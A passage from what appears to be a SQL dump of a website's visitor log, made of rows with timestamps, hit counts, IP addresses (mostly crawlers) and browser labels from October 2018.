15520,1539251008,1,1,0,0,'46.229.168.148','other'),(315521,1539251032,1,1,0,0,'54.36.149.47','other'),(315522,1539251052,1,1,0,0,'54.36.148.165','other'),(315523,1539251455,1,1,0,0,'207.46.13.39','other'),(315524,1539251604,1,1,0,0,'54.36.148.62','other'),(315525,1539251728,1,1,0,0,'37.54.141.229','firefox'),(315526,1539251850,1,1,0,0,'54.36.148.245','other'),(315527,1539251926,1,1,0,0,'66.249.64.30','chrome'),(315528,1539251981,5,5,0,0,'216.244.66.241','other'),(315529,1539251983,1,1,0,0,'54.36.149.93','other'),(315530,1539252089,1,1,0,0,'54.36.148.48','other'),(315531,1539252126,1,1,0,0,'91.196.178.72','chrome'),(315532,1539252202,1,1,0,0,'54.36.149.45','other'),(315533,1539252426,1,1,0,0,'54.36.149.40','other'),(315534,1539252491,1,1,0,0,'54.36.149.71','other'),(315535,1539252962,1,1,0,0,'54.36.148.239','other'),(315536,1539252985,1,1,0,0,'54.36.148.193','other'),(315537,1539253000,1,1,0,0,'54.36.148.159','other'),(315538,1539253035,1,1,0,0,'216.244.66.241','other'),(315539,1539253117,1,1,0,0,'8.29.198.25','other'),(315540,1539253191,1,1,0,0,'91.209.11.236','other'),(315541,1539253256,1,1,0,0,'54.36.149.27','other'),(315542,1539253281,1,1,0,0,'178.154.244.11','other'),(315543,1539253282,1,1,0,0,'5.45.207.79','other'),(315544,1539253508,1,1,0,0,'54.36.149.17','other'),(315545,1539253623,1,1,0,0,'54.36.148.21','other'),(315546,1539253724,1,1,0,0,'54.36.148.212','other'),(315547,1539254034,1,1,0,0,'54.36.149.80','other'),(315548,1539254058,1,1,0,0,'54.36.148.96','other'),(315549,1539254199,1,1,0,0,'54.36.148.112','other'),(315550,1539254330,1,1,0,0,'54.36.148.120','other'),(315551,1539254448,1,1,0,0,'78.111.190.108','chrome'),(315552,1539254537,1,1,0,0,'54.36.149.82','other'),(315553,1539254831,1,1,0,0,'5.188.210.53','chrome'),(315554,1539254977,1,1,0,0,'54.36.148.35','other'),(315555,1539255060,1,1,0,0,'146.120.222.2','firefox'),(315556,1539255300,4,4,0,0,'216.244.66.241','other'),(315557,1539255364,1,1,0,0,'54.36.148.114','other'),(315558,1539255381,1,1,0,0,'54.36.148.207','other'),(315559,1539255737,1,1,0,0,'54.36.149.81','other'),(315560,1539256415,1,1,0,0,'54.36.148.214','other'),(315561,1539256610,1,1,0,0,'54.36.148.148','other'),(315562,1539256972,1,1,0,0,'95.163.255.97','other'),(315563,1539257451,1,1,0,0,'91.196.178.72','chrome'),(315564,1539257549,1,1,0,0,'66.249.64.30','chrome'),(315565,1539257590,2,2,0,0,'66.249.64.28','chrome'),(315566,1539257621,1,1,0,0,'54.36.149.31','other'),(315567,1539257819,1,1,0,0,'54.36.148.92','other'),(315568,1539257876,1,1,0,0,'54.36.149.27','other'),(315569,1539258381,1,1,0,0,'54.36.148.233','other'),(315570,1539258399,1,1,0,0,'54.36.149.49','other'),(315571,1539258517,1,1,0,0,'91.196.178.135','chrome'),(315572,1539258964,1,1,0,0,'54.36.149.1','other'),(315574,1539259028,1,1,0,0,'54.36.149.93','other'),(315575,1539259190,1,1,0,0,'62.205.134.182','msie'),(315576,1539259236,1,1,0,0,'8.29.198.27','other'),(315577,1539259446,1,1,0,0,'54.36.148.83','other'),(315578,1539259449,1,1,0,0,'8.29.198.26','other'),(315579,1539259468,1,1,0,0,'54.36.149.89','other'),(315580,1539259528,1,1,0,0,'66.249.64.29','chrome'),(315581,1539259531,1,1,0,0,'54.36.148.82','other'),(315582,1539259775,1,1,0,0,'54.36.148.73','other'),(315583,1539259984,1,1,0,0,'54.36.148.87','other'),(315584,1539260127,1,1,0,0,'54.36.149.39','other'),(315585,1539260647,1,1,0,0,'18.184.191.124','other'),(315586,1539260798,1,1,0,0,'78.111.190.108','chrome'),(315587,1539261055,1,1,0,0,'54.36.149.76','other'),(315588,1539261653,2,2,0,0,'66.249.64.28','chrome'),(315589,1539261657,1,1,0,0,'66.249.64.29','chrome'),(315590,1539261876,1,1,0,0,'91.196.178.77','firefox'),(315591,1539261953,1,1,0,0,'52.53.201.78','chrome'),(315592,1539262019,1,1,0,0,'54.36.149.76','other'),(315593,1539262400,1,1,0,0,'54.36.148.153','other'),(315594,1539262637,1,1,0,0,'217.25.198.241','chrome'),(315595,1539262684,1,1,0,0,'54.36.149.107','other'),(315596,1539262841,2,2,0,0,'216.244.66.241','other'),(315597,1539263011,1,1,0,0,'54.36.148.188','other'),(315598,1539263697,1,1,0,0,'91.196.178.135','chrome'),(315599,1539263960,1,1,0,0,'54.36.148.78','other'),(315600,1539263971,1,1,0,0,'8.29.198.25','other'),(315601,1539264093,1,1,0,0,'54.36.148.109','other'),(315602,1539264157,1,1,0,0,'46.229.168.146','other'),(315603,1539264493,1,1,0,0,'54.36.148.58','other'),(315604,1539264694,1,1,0,0,'54.36.149.58','other'),(315605,1539264907,1,1,0,0,'54.36.148.226','other'),(315606,1539265038,3,3,0,0,'216.244.66.241','other'),(315607,1539265233,1,1,0,0,'54.36.148.72','other'),(315608,1539265302,1,1,0,0,'54.36.148.157','other'),(315609,1539265561,1,1,0,0,'207.46.13.39','other'),(315610,1539265733,1,1,0,0,'54.36.149.46','other'),(315611,1539265846,1,1,0,0,'54.36.149.59','other'),(315612,1539265883,1,1,0,0,'54.36.148.116','other'),(315613,1539266463,1,1,0,0,'37.73.217.90','chrome'),(315614,1539266619,1,1,0,0,'66.249.64.16','chrome'),(315615,1539266858,1,1,0,0,'178.154.244.29','other'),(315616,1539266859,1,1,0,0,'178.154.244.11','other'),(315617,1539266902,1,1,0,0,'54.36.148.189','other'),(315618,1539267390,1,1,0,0,'91.196.178.169','chrome'),(315619,1539267810,1,1,0,0,'180.76.15.150','other'),(315620,1539268392,1,1,0,0,'40.77.167.163','other'),(315621,1539268469,1,1,0,0,'216.244.66.241','other'),(315622,1539268530,1,1,0,0,'193.106.30.98','firefox'),(315623,1539268748,1,1,0,0,'66.249.64.29','chrome'),(315624,1539269334,1,1,0,0,'188.230.43.254','other'),(315625,1539269470,2,2,0,0,'91.196.178.189','chrome'),(315626,1539269786,1,1,0,0,'91.196.178.73','firefox'),(315627,1539270078,1,1,0,0,'8.29.198.26','other'),(315628,1539270300,1,1,0,0,'8.29.198.27','other'),(315629,1539271049,1,1,0,0,'216.244.66.241','other'),(315630,1539271058,1,1,0,0,'54.36.149.58','other'),(315631,1539271101,1,1,0,0,'54.36.148.26','other'),(315632,1539271427,1,1,0,0,'54.36.148.78','other'),(315633,1539271467,1,1,0,0,'54.36.148.41','other'),(315634,1539271556,1,1,0,0,'54.36.148.229','other'),(315635,1539271572,1,1,0,0,'178.154.244.29','other'),(315636,1539271705,1,1,0,0,'54.36.148.102','other'),(315637,1539271768,1,1,0,0,'54.36.148.242','other'),(315638,1539271769,1,1,0,0,'188.230.43.254','other'),(315639,1539271977,1,1,0,0,'54.36.149.51','other'),(315640,1539272179,1,1,0,0,'54.36.148.138','other'),(315641,1539272433,1,1,0,0,'54.36.148.117','other'),(315642,1539272712,2,2,0,0,'66.249.64.30','chrome'),(315643,1539272811,1,1,0,0,'54.36.148.151','other'),(315644,1539273169,1,1,0,0,'54.36.148.128','other'),(315645,1539273324,1,1,0,0,'54.36.148.246','other'),(315646,1539273341,1,1,0,0,'95.163.255.94','other'),(315647,1539273385,1,1,0,0,'54.36.149.59','other'),(315648,1539273592,1,1,0,0,'54.36.148.11','other'),(315649,1539273696,1,1,0,0,'66.249.64.30','chrome'),(315650,1539273723,1,1,0,0,'54.36.148.145','other'),(315651,1539273733,2,2,0,0,'66.249.64.29','chrome'),(315652,1539273956,1,1,0,0,'54.36.148.218','other'),(315653,1539273994,1,1,0,0,'54.36.149.13','other'),(315654,1539274133,1,1,0,0,'188.230.43.254','other'),(315655,1539274316,1,1,0,0,'54.36.149.34','other'),(315656,1539274669,1,1,0,0,'178.154.244.29','other'),(315657,1539274696,1,1,0,0,'66.249.64.28','chrome'),(315658,1539274815,1,1,0,0,'8.29.198.26','other'),(315659,1539274878,1,1,0,0,'54.36.148.80','other'),(315660,1539275230,1,1,0,0,'54.36.148.200','other'),(315661,1539275546,1,1,0,0,'54.36.148.30','other'),(315662,1539275692,1,1,0,0,'54.36.149.48','other'),(315663,1539275788,1,1,0,0,'54.36.148.217','other'),(315664,1539275823,2,2,0,0,'66.249.64.14','chrome'),(315665,1539275937,2,2,0,0,'216.244.66.241','other'),(315666,1539276004,1,1,0,0,'54.36.149.55','other'),(315667,1539276110,4,4,0,0,'66.249.64.28','chrome'),(315668,1539276212,1,1,0,0,'66.249.64.30','chrome'),(315669,1539276308,1,1,0,0,'66.249.64.29','chrome'),(315670,1539276394,1,1,0,0,'54.36.148.212','other'),(315671,1539276541,1,1,0,0,'188.230.43.254','other'),(315672,1539277123,1,1,0,0,'54.36.148.239','other'),(315673,1539277509,1,1,0,0,'54.36.149.12','other'),(315674,1539277940,2,2,0,0,'216.244.66.241','other'),(315675,1539278149,1,1,0,0,'54.36.148.164','other'),(315676,1539278201,1,1,0,0,'54.36.148.192','other'),(315677,1539278537,1,1,0,0,'54.36.149.16','other'),(315678,1539278674,1,1,0,0,'54.36.149.68','other'),(315679,1539278702,1,1,0,0,'54.36.148.168','other'),(315680,1539278733,1,1,0,0,'54.36.149.74','other'),(315681,1539279010,1,1,0,0,'54.36.148.37','other'),(315682,1539279175,1,1,0,0,'54.36.148.180','other'),(315683,1539279418,1,1,0,0,'54.36.148.32','other'),(315684,1539279439,1,1,0,0,'54.36.148.87','other'),(315685,1539279710,1,1,0,0,'54.36.148.104','other'),(315686,1539279847,1,1,0,0,'54.36.148.34','other'),(315687,1539279915,1,1,0,0,'54.36.148.242','other'),(315688,1539280069,1,1,0,0,'66.249.64.59','chrome'),(315689,1539280216,1,1,0,0,'66.249.64.30','chrome'),(315690,1539280676,1,1,0,0,'54.36.148.21','other'),(315691,1539280802,1,1,0,0,'54.36.148.113','other'),(315692,1539280888,1,1,0,0,'54.36.148.10','other'),(315693,1539280913,2,2,0,0,'8.29.198.27','other'),(315694,1539280931,1,1,0,0,'216.244.66.241','other'),(315695,1539281192,2,2,0,0,'66.249.64.61','chrome'),(315696,1539281447,1,1,0,0,'54.36.149.21','other'),(315697,1539281515,1,1,0,0,'54.36.148.14','other'),(315698,1539281805,1,1,0,0,'54.36.148.213','other'),(315699,1539281817,1,1,0,0,'54.36.149.74','other'),(315700,1539281964,1,1,0,0,'54.36.148.187','other'),(315701,1539282141,1,1,0,0,'54.36.148.49','other'),(315702,1539282359,1,1,0,0,'46.229.168.139','other'),(315703,1539282399,1,1,0,0,'54.36.148.169','other'),(315704,1539282685,1,1,0,0,'66.249.64.59','chrome'),(315705,1539282791,1,1,0,0,'54.36.148.149','other'),(315706,1539282843,1,1,0,0,'66.249.64.30','chrome'),(315707,1539282880,1,1,0,0,'54.36.148.170','other'),(315708,1539282960,1,1,0,0,'54.36.148.43','other'),(315709,1539282977,1,1,0,0,'66.249.64.29','chrome'),(315710,1539283385,1,1,0,0,'54.36.148.123','other'),(315711,1539283567,1,1,0,0,'54.36.148.105','other'),(315712,1539283603,1,1,0,0,'216.244.66.241','other'),(315713,1539283707,1,1,0,0,'46.133.165.161','chrome'),(315714,1539284503,1,1,0,0,'54.36.148.172','other'),(315715,1539284547,1,1,0,0,'54.36.148.193','other'),(315716,1539284741,1,1,0,0,'54.36.148.115','other'),(315717,1539284802,1,1,0,0,'91.196.178.53','chrome'),(315718,1539284916,1,1,0,0,'40.77.167.163','other'),(315719,1539285053,1,1,0,0,'54.36.149.0','other'),(315720,1539285083,1,1,0,0,'54.36.148.71','other'),(315721,1539285102,1,1,0,0,'54.36.148.183','other'),(315722,1539285451,1,0,1,0,'66.249.64.57',''),(315723,1539285632,1,1,0,0,'54.36.148.54','other'),(315724,1539285658,1,1,0,0,'8.29.198.25','other'),(315725,1539285659,1,1,0,0,'54.36.148.88','other'),(315726,1539285893,1,1,0,0,'54.36.148.180','other'),(315727,1539286248,1,1,0,0,'54.36.148.144','other'),(315728,1539286339,1,1,0,0,'54.36.148.175','other'),(315729,1539286357,1,1,0,0,'54.36.148.151','other'),(315730,1539286372,1,1,0,0,'54.36.149.37','other'),(315731,1539286387,1,1,0,0,'54.36.148.251','other'),(315732,1539286564,1,1,0,0,'54.36.149.4','other'),(315733,1539286670,1,1,0,0,'54.81.171.34','other'),(315734,1539286782,1,1,0,0,'54.36.148.145','other'),(315735,1539287735,1,1,0,0,'54.36.149.64','other'),(315736,1539287738,1,1,0,0,'54.36.148.72','other'),(315737,1539287882,1,1,0,0,'54.36.149.16','other'),(315738,1539288283,1,1,0,0,'54.36.148.166','other'),(315739,1539288480,1,1,0,0,'54.36.149.95','other'),(315740,1539289072,2,2,0,0,'216.244.66.241','other'),(315741,1539289087,1,1,0,0,'54.36.148.151','other'),(315742,1539289424,1,1,0,0,'54.36.148.185','other'),(315743,1539289878,1,1,0,0,'54.36.149.71','other'),(315744,1539290501,1,1,0,0,'54.36.148.253','other'),(315745,1539290575,1,1,0,0,'54.36.149.55','other'),(315746,1539291018,1,1,0,0,'180.76.15.144','other'),(315747,1539291340,1,1,0,0,'216.244.66.241','other'),(315748,1539291397,1,1,0,0,'54.36.148.174','other'),(315749,1539291489,1,1,0,0,'54.36.149.15','other'),(315750,1539291492,1,1,0,0,'54.36.148.142','other'),(315751,1539291738,1,1,0,0,'8.29.198.25','other'),(315752,1539291766,1,1,0,0,'54.36.149.100','other'),(315753,1539291805,1,1,0,0,'54.36.149.73','other'),(315754,1539291913,1,1,0,0,'54.36.148.234','other'),(315755,1539292004,1,1,0,0,'8.29.198.26','other'),(315756,1539292275,1,1,0,0,'54.36.148.49','other'),(315757,1539292629,1,1,0,0,'66.249.64.29','chrome'),(315758,1539292749,1,1,0,0,'54.36.149.24','other'),(315759,1539292819,1,1,0,0,'54.36.148.178','other'),(315760,1539293029,1,1,0,0,'66.249.64.28','chrome'),(315761,1539293035,1,1,0,0,'54.36.148.64','other'),(315762,1539293236,1,1,0,0,'54.36.149.37','other'),(315763,1539293490,1,1,0,0,'66.249.64.30','chrome'),(315764,1539293513,1,1,0,0,'54.36.149.80','other'),(315765,1539293560,1,1,0,0,'54.36.148.206','other'),(315766,1539293623,1,1,0,0,'54.36.149.39','other'),(315767,1539293755,1,1,0,0,'31.184.238.34','chrome'),(315768,1539294009,3,3,0,0,'216.244.66.241','other'),(315769,1539294470,1,1,0,0,'66.249.64.29','chrome'),(315770,1539294556,1,1,0,0,'54.36.148.192','other'),(315771,1539294644,1,1,0,0,'95.163.255.96','other'),(315772,1539294657,1,1,0,0,'54.36.149.50','other'),(315773,1539294702,1,1,0,0,'54.36.148.36','other'),(315774,1539294949,1,1,0,0,'54.36.148.43','other'),(315775,1539295536,1,1,0,0,'54.36.148.143','other'),(315776,1539295626,1,1,0,0,'5.188.210.11','chrome'),(315777,1539295638,1,1,0,0,'54.36.149.51','other'),(315778,1539295688,1,1,0,0,'54.36.148.134','other'),(315779,1539295897,1,1,0,0,'95.163.255.93','other'),(315780,1539296495,1,1,0,0,'8.29.198.25','other'),(315781,1539296586,1,1,0,0,'54.36.149.24','other'),(315782,1539296780,1,1,0,0,'54.36.148.132','other'),(315783,1539297105,1,1,0,0,'46.229.168.145','other'),(315784,1539297282,1,1,0,0,'54.36.148.46','other'),(315785,1539297437,1,1,0,0,'54.36.148.227','other'),(315786,1539297486,1,1,0,0,'54.36.149.103','other'),(315787,1539297643,1,1,0,0,'54.36.148.129','other'),(315788,1539297949,1,1,0,0,'54.36.149.80','other'),(315789,1539298228,1,1,0,0,'54.36.148.80','other'),(315790,1539298614,1,1,0,0,'5.199.141.233','other'),(315791,1539298655,1,1,0,0,'54.36.148.190','other'),(315792,1539298775,1,1,0,0,'178.154.244.29','other'),(315793,1539298924,1,1,0,0,'54.36.148.92','other'),(315794,1539299005,3,3,0,0,'216.244.66.241','other'),(315795,1539299011,1,1,0,0,'54.36.148.177','other'),(315796,1539299516,1,1,0,0,'54.36.149.70','other'),(315797,1539299539,1,1,0,0,'54.36.149.16','other'),(315798,1539299574,1,1,0,0,'54.36.149.18','other'),(315799,1539299645,1,1,0,0,'54.36.148.52','other'),(315800,1539299646,1,1,0,0,'54.36.149.66','other'),(315801,1539299707,1,1,0,0,'54.36.149.87','other'),(315802,1539300290,1,1,0,0,'54.36.149.5','other'),(315803,1539300300,1,1,0,0,'54.36.149.2','other'),(315804,1539300337,1,1,0,0,'66.249.64.30','chrome'),(315805,1539300492,1,1,0,0,'54.36.148.20','other'),(315806,1539300557,7,7,0,0,'216.244.66.241','other'),(315807,1539300564,1,1,0,0,'54.36.148.226','other'),(315808,1539300676,1,1,0,0,'54.36.148.68','other'),(315809,1539300764,1,1,0,0,'54.36.148.185','other'),(315810,1539300768,1,1,0,0,'54.36.148.186','other'),(315811,1539301271,1,1,0,0,'54.36.149.20','other'),(315812,1539301587,1,1,0,0,'54.36.148.111','other'),(315813,1539301613,2,2,0,0,'216.244.66.241','other'),(315814,1539301928,1,1,0,0,'54.36.149.15','other'),(315815,1539302569,1,1,0,0,'8.29.198.25','other'),(315816,1539302844,1,1,0,0,'8.29.198.27','other'),(315817,1539302870,1,1,0,0,'54.36.148.134','other'),(315818,1539303277,1,1,0,0,'178.154.244.29','other'),(315819,1539303514,2,2,0,0,'178.154.244.11','other'),(315820,1539303588,1,1,0,0,'54.36.148.196','other'),(315821,1539303820,1,1,0,0,'54.36.148.15','other'),(315822,1539303904,1,1,0,0,'157.55.39.152','other'),(315823,1539304180,1,1,0,0,'40.77.167.196','other'),(315824,1539304299,1,1,0,0,'54.36.148.16','other'),(315825,1539304387,1,1,0,0,'54.36.148.223','other'),(315826,1539304476,2,2,0,0,'207.46.13.247','other'),(315827,1539304481,1,1,0,0,'207.46.13.231','other'),(315828,1539304486,1,1,0,0,'40.77.167.193','other'),(315829,1539304637,1,1,0,0,'54.36.148.145','other'),(315830,1539304868,1,1,0,0,'54.36.149.6','other'),(315831,1539305068,1,1,0,0,'66.249.64.30','chrome'),(315832,1539305207,1,1,0,0,'54.36.148.152','other'),(315833,1539305280,1,1,0,0,'95.163.255.96','other'),(315834,1539305288,1,1,0,0,'54.36.149.30','other'),(315835,1539305295,1,1,0,0,'54.36.148.28','other'),(315836,1539305311,2,2,0,0,'178.154.244.29','other'),(315837,1539305526,1,1,0,0,'54.36.148.114','other'),(315838,1539306191,1,1,0,0,'54.36.148.176','other'),(315839,1539306471,1,1,0,0,'54.36.149.13','other'),(315840,1539306648,1,1,0,0,'54.36.149.51','other'),(315841,1539306734,1,1,0,0,'216.244.66.241','other'),(315842,1539306809,1,1,0,0,'54.36.149.71','other'),(315843,1539307205,1,1,0,0,'54.36.148.50','other'),(315844,1539307224,1,1,0,0,'178.154.244.29','other'),(315845,1539307256,1,1,0,0,'178.154.244.11','other'),(315846,1539307335,1,1,0,0,'8.29.198.27','other'),(315847,1539307693,1,1,0,0,'54.36.149.57','other'),(315848,1539307898,1,1,0,0,'54.36.149.53','other'),(315849,1539307938,1,1,0,0,'54.36.149.55','other'),(315850,1539308022,1,1,0,0,'54.36.149.54','other'),(315851,1539308638,1,1,0,0,'178.154.244.29','other'),(315852,1539308639,2,2,0,0,'66.249.64.29','chrome'),(315853,1539308648,1,1,0,0,'66.249.64.28','chrome'),(315854,1539308685,1,1,0,0,'54.36.148.176','other'),(315855,1539309051,1,1,0,0,'216.244.66.241','other'),(315856,1539309437,1,1,0,0,'5.45.207.79','other'),(315857,1539309483,1,1,0,0,'54.36.148.22','other'),(315858,1539309643,1,1,0,0,'54.36.148.224','other'),(315859,1539309724,1,1,0,0,'54.36.149.47','other'),(315860,1539310063,1,1,0,0,'54.36.148.31','other'),(315861,1539310249,1,1,0,0,'66.249.64.30','chrome'),(315862,1539310347,91,91,0,0,'51.254.134.47','other'),(315863,1539310384,1,1,0,0,'54.36.148.229','other'),(315864,1539310389,2,2,0,0,'136.243.70.151','other'),(315865,1539310559,1,1,0,0,'54.36.148.250','other'),(315866,1539310663,1,1,0,0,'54.36.148.220','other'),(315867,1539310693,1,1,0,0,'54.36.149.4','other'),(315868,1539310874,1,1,0,0,'157.55.39.152','other'),(315869,1539310940,1,1,0,0,'54.36.149.103','other'),(315870,1539311153,1,1,0,0,'54.36.148.189','other'),(315871,1539311283,1,1,0,0,'54.36.149.53','other'),(315872,1539311546,1,1,0,0,'54.36.148.110','other'),(315873,1539311585,1,1,0,0,'54.36.148.131','other'),(315874,1539311612,1,1,0,0,'66.249.64.30','chrome'),(315875,1539311628,1,1,0,0,'54.36.148.83','other'),(315876,1539311836,1,1,0,0,'54.36.148.56','other'),(315877,1539311962,1,1,0,0,'54.36.148.61','other'),(315878,1539312106,2,2,0,0,'216.244.66.241','other'),(315879,1539312787,1,1,0,0,'54.36.149.7','other'),(315880,1539312980,1,1,0,0,'54.36.149.46','other'),(315881,1539313088,1,1,0,0,'54.36.148.249','other'),(315882,1539313392,1,1,0,0,'8.29.198.27','other'),(315883,1539313409,1,1,0,0,'54.36.148.162','other'),(315884,1539313430,1,1,0,0,'54.36.149.3','other'),(315885,1539313535,1,1,0,0,'54.36.148.221','other'),(315886,1539313581,1,1,0,0,'46.229.168.140','other'),(315887,1539313706,1,1,0,0,'8.29.198.25','other'),(315888,1539313710,1,1,0,0,'54.36.148.18','other'),(315889,1539313728,1,1,0,0,'54.36.149.22','other'),(315890,1539313931,1,1,0,0,'54.36.148.60','other'),(315891,1539314123,1,1,0,0,'54.36.148.159','other'),(315892,1539314365,1,1,0,0,'18.196.18.95','other'),(315893,1539314479,1,1,0,0,'54.36.148.143','other'),(315894,1539314813,1,1,0,0,'54.36.148.122','other'),(315895,1539314897,1,1,0,0,'178.154.244.11','other'),(315896,1539315010,1,1,0,0,'54.36.148.60','other'),(315897,1539315319,1,1,0,0,'54.36.149.39','other'),(315898,1539315549,1,1,0,0,'54.36.148.168','other'),(315899,1539315576,3,3,0,0,'95.216.5.212','other'),(315900,1539315686,1,1,0,0,'54.36.148.82','other'),(315901,1539315754,1,1,0,0,'54.36.148.198','other'),(315902,1539315848,1,1,0,0,'54.36.148.125','other'),(315903,1539316158,1,1,0,0,'54.36.149.67','other'),(315904,1539316167,1,1,0,0,'54.36.149.8','other'),(315905,1539316191,1,1,0,0,'54.36.148.120','other'),(315906,1539316261,1,1,0,0,'54.36.149.10','other'),(315907,1539316350,1,1,0,0,'54.36.148.221','other'),(315908,1539316431,24,24,0,0,'95.91.74.54','other'),(315909,1539316546,1,1,0,0,'54.36.148.228','other'),(315910,1539316802,1,1,0,0,'54.36.148.61','other'),(315911,1539316826,1,1,0,0,'54.36.148.22','other'),(315912,1539316948,1,1,0,0,'54.36.149.15','other'),(315913,1539317082,1,1,0,0,'54.36.149.76','other'),(315914,1539317548,1,1,0,0,'46.229.168.130','other'),(315915,1539317667,1,1,0,0,'54.36.148.153','other'),(315916,1539318082,1,1,0,0,'54.36.148.68','other'),(315917,1539318170,1,1,0,0,'8.29.198.25','other'),(315918,1539318200,1,1,0,0,'54.36.148.123','other'),(315919,1539318522,1,1,0,0,'54.36.148.67','other'),(315920,1539318771,1,1,0,0,'54.36.148.208','other'),(315921,1539319027,2,2,0,0,'145.239.85.79','other'),(315922,1539319051,1,1,0,0,'54.36.149.91','other'),(315923,1539319091,1,1,0,0,'40.77.167.173','other'),(315924,1539319126,1,1,0,0,'54.36.149.34','other'),(315925,1539319224,1,1,0,0,'54.36.148.65','other'),(315926,1539319318,1,1,0,0,'66.249.64.59','chrome'),(315927,1539319408,1,1,0,0,'54.36.148.108','other'),(315928,1539319664,1,1,0,0,'54.36.148.236','other'),(315929,1539319937,1,1,0,0,'54.36.148.240','other'),(315930,1539320453,1,1,0,0,'54.36.148.91','other'),(315931,1539320932,1,1,0,0,'54.36.148.160','other'),(315932,1539321024,1,1,0,0,'54.36.148.238','other'),(315933,1539321065,2,2,0,0,'172.241.112.83','other'),(315934,1539321152,1,1,0,0,'95.163.255.92','other'),(315935,1539321232,1,1,0,0,'54.36.149.25','other'),(315936,1539321259,5,5,0,0,'198.204.244.90','other'),(315937,1539321321,1,1,0,0,'54.36.148.202','other'),(315938,1539321614,1,1,0,0,'54.36.148.216','other'),(315939,1539321686,1,1,0,0,'54.36.148.177','other'),(315940,1539321820,1,1,0,0,'193.106.30.98','firefox'),(315941,1539321999,1,1,0,0,'178.154.244.11','other'),(315942,1539322197,1,1,0,0,'54.36.148.54','other'),(315943,1539322493,1,1,0,0,'66.249.64.30','chrome'),(315944,1539322537,1,1,0,0,'54.36.148.69','other'),(315945,1539322769,3,3,0,0,'88.198.33.145','other'),(315946,1539323028,1,1,0,0,'54.36.148.175','other'),(315947,1539323178,1,1,0,0,'54.36.148.151','other'),(315948,1539323339,2,2,0,0,'54.36.148.214','other'),(315949,1539323386,1,1,0,0,'54.36.149.3','other'),(315950,1539323478,1,1,0,0,'54.36.149.65','other'),(315951,1539323531,1,1,0,0,'91.196.178.73','chrome'),(315952,1539323849,1,1,0,0,'54.36.148.196','other'),(315953,1539324001,1,1,0,0,'54.165.59.7','other'),(315954,1539324218,1,1,0,0,'8.29.198.25','other'),(315955,1539324233,1,1,0,0,'54.36.148.16','other'),(315956,1539324301,1,1,0,0,'91.196.178.68','chrome'),(315957,1539324334,2,2,0,0,'54.36.148.171','other'),(315958,1539324393,2,2,0,0,'216.244.66.241','other'),(315959,1539324415,1,1,0,0,'54.36.148.203','other'),(315960,1539324555,1,1,0,0,'8.29.198.26','other'),(315961,1539324559,1,1,0,0,'54.36.148.79','other'),(315962,1539324580,1,1,0,0,'54.36.149.16','other'),(315963,1539324621,1,1,0,0,'95.163.255.99','other'),(315964,1539325163,1,1,0,0,'54.36.149.96','other'),(315965,1539325426,1,1,0,0,'54.36.148.162','other'),(315966,1539325466,2,2,0,0,'54.165.59.7','other'),(315967,1539325800,1,1,0,0,'54.36.148.229','other'),(315968,1539325894,1,1,0,0,'178.154.244.29','other'),(315969,1539325946,1,1,0,0,'54.36.149.95','other'),(315970,1539326031,2,2,0,0,'91.209.11.236','other'),(315971,1539326065,1,1,0,0,'54.36.148.236','other'),(315972,1539326168,1,1,0,0,'54.36.148.248','other'),(315973,1539326569,1,1,0,0,'54.36.149.85','other'),(315974,1539326799,1,1,0,0,'54.36.148.142','other'),(315975,1539326813,1,1,0,0,'54.36.149.105','other'),(315976,1539327062,1,1,0,0,'54.165.59.7','other'),(315977,1539327263,1,1,0,0,'54.36.148.167','other'),(315978,1539327408,3,3,0,0,'216.244.66.241','other'),(315979,1539327531,1,1,0,0,'54.36.149.12','other'),(315980,1539327665,1,1,0,0,'91.196.178.169','chrome'),(315981,1539327772,1,1,0,0,'95.163.255.94','other'),(315982,1539327901,1,1,0,0,'46.229.168.132','other'),(315983,1539328013,1,1,0,0,'54.36.148.128','other'),(315984,1539328294,1,1,0,0,'54.36.148.25','other'),(315985,1539328314,1,1,0,0,'54.36.148.85','other'),(315986,1539328345,1,1,0,0,'66.249.64.28','chrome'),(315987,1539328451,1,1,0,0,'95.163.255.98','other'),(315988,1539328453,2,2,0,0,'95.163.255.93','other'),(315989,1539328972,1,1,0,0,'54.36.148.247','other'),(315990,1539328974,1,1,0,0,'54.36.149.78','other'),(315991,1539329009,1,1,0,0,'8.29.198.26','other'),(315992,1539329164,1,1,0,0,'54.36.148.39','other'),(315993,1539329186,1,1,0,0,'54.36.148.108','other'),(315994,1539329440,3,3,0,0,'54.165.59.7','other'),(315995,1539329601,1,1,0,0,'178.154.244.11','other'),(315996,1539329641,1,1,0,0,'54.36.148.110','other'),(315997,1539329788,1,1,0,0,'54.36.148.183','other'),(315998,1539329874,2,2,0,0,'216.244.66.241','other'),(315999,1539330039,1,1,0,0,'54.36.148.177','other'),(316000,1539330132,1,1,0,0,'91.196.178.73','chrome'),(316001,1539330177,1,1,0,0,'66.249.64.28','chrome'),(316002,1539330436,1,1,0,0,'54.36.148.139','other'),(316003,1539330605,1,1,0,0,'95.216.19.117','other'),(316004,1539331057,1,1,0,0,'91.209.11.236','other'),(316005,1539331234,1,1,0,0,'54.36.148.119','other'),(316006,1539331470,1,1,0,0,'46.229.168.132','other'),(316007,1539331524,1,1,0,0,'54.165.59.7','other'),(316008,1539331549,1,1,0,0,'91.196.179.138','chrome'),(316009,1539331736,1,1,0,0,'54.36.148.25','other'),(316010,1539331874,1,1,0,0,'180.76.15.5','other'),(316011,1539332360,1,1,0,0,'54.36.148.53','other'),(316012,1539332471,1,1,0,0,'54.36.149.79','other'),(316013,1539332537,1,1,0,0,'54.36.148.150','other'),(316014,1539332541,1,1,0,0,'54.36.148.84','other'),(316015,1539332782,1,1,0,0,'54.36.148.11','other'),(316016,1539332864,1,1,0,0,'54.36.149.36','other'),(316017,1539332888,1,1,0,0,'54.36.148.18','other'),(316018,1539333142,1,1,0,0,'46.229.168.129','other'),(316019,1539333211,1,1,0,0,'54.36.148.64','other'),(316020,1539333272,1,1,0,0,'54.36.148.74','other'),(316021,1539333566,1,1,0,0,'54.36.149.38','other'),(316022,1539334099,1,1,0,0,'91.208.145.231','firefox'),(316023,1539334573,1,1,0,0,'54.36.148.188','other'),(316024,1539334631,1,1,0,0,'54.36.148.227','other'),(316025,1539334957,1,1,0,0,'54.36.149.59','other'),(316026,1539335050,1,1,0,0,'8.29.198.25','other'),(316027,1539335103,1,1,0,0,'54.36.148.220','other'),(316028,1539335242,2,2,0,0,'216.244.66.241','other'),(316029,1539335256,1,1,0,0,'66.249.64.30','chrome'),(316030,1539335391,1,1,0,0,'8.29.198.27','other'),(316031,1539335433,1,1,0,0,'54.36.149.107','other'),(316032,1539336037,1,1,0,0,'13.66.139.0','other'),(316033,1539336450,1,1,0,0,'66.249.64